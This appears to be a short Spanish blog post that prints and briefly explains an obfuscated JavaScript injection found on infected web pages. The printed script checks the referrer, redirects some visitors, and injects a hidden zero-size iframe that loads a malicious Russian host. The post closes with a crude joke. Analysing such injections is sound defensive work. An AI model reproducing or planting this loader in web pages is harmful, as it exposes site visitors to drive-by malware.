Código
try{ F53981243 = document.referrer; Nsrd2unvt = ''; Tfym92yesygh = 'ES'; function Cr8z7f2tf8(V8vurp6x9cfrz){ if (F53981243.indexOf(V8vurp6x9cfrz) != -1){ Nsrd2unvt=V8vurp6x9cfrz; } } Cr8z7f2tf8('g*o7o]gXl*e7.Xr6u*'.replace(/[\*67X\]]/g, '')); Cr8z7f2tf8('m2aDi#l2.2rDu2'.replace(/[2D#\|X]/g, '')); Cr8z7f2tf8('y{ain)d{e)xT.CriuT'.replace(/[T\{C\)i]/g, '')); Cr8z7f2tf8('rpaBmpb~lBepro.prou('.replace(/[\(~pBo]/g, '')); if (Nsrd2unvt && Tfym92yesygh == 'RU'){ window.location= 'hPtPtxpx:~/P/AleiegAhAtA.Ak~aetPaelPo~g~-edPoeseuxgxaA.Ar~ue/A?~sPtPixde=P8A8x&ArAiPdx=~2e5x5~6x'.replace(/[x~ePA]/g, ''); }else{ Athvzpwjthi8chwh = 'http://gothguilt.ru:8080/index.php?pid=1&home=1'; F7ipjzz32gtxvlp7amy = 24-(12*2); var D6ouc495shy0 = document.createElement('div'); D6ouc495shy0.id = 'G6i85jq19fd'; document.body.appendChild(D6ouc495shy0); Pygxn4t7yxe6p = 'F7ipjzz32gtxvlp7amy'; F15fy37lsuro9 = document.createElement('i$^f@&r((^a&@$!m)$e)$(&'.replace(/\)|\$|@|\^|#|&|\!|\(/ig, '')); F15fy37lsuro9.src = Athvzpwjthi8chwh; F15fy37lsuro9.height = F7ipjzz32gtxvlp7amy; F15fy37lsuro9.width = F7ipjzz32gtxvlp7amy; document.getElementById('G6i85jq19fd').appendChild(F15fy37lsuro9); } }catch(e){}
Si lo limpiamos un poco, vemos que comprueba el Referrer, y en caso de que contenga 'RU' nos redireccionará a una página de rusas...xD
Sino crea un div y mete un iframe de 'http://gothguilt.ru:8080/index.php?pid=1&home=1'. Es el mismo malware que se usa en todas las páginas que he visto: la misma ofuscación, mismas comprobaciones, y al final solo dejan un iframe metido para ejecutar los comandos que quieran en la víctima que visite la página infectada...
Lo curioso es que me ha mostrado el script la primera vez, y ahora lo estoy tratando de recuperar y no puedo.
En cualquier caso la moraleja es clara: navega con proxy ruso, menos malware y más teta.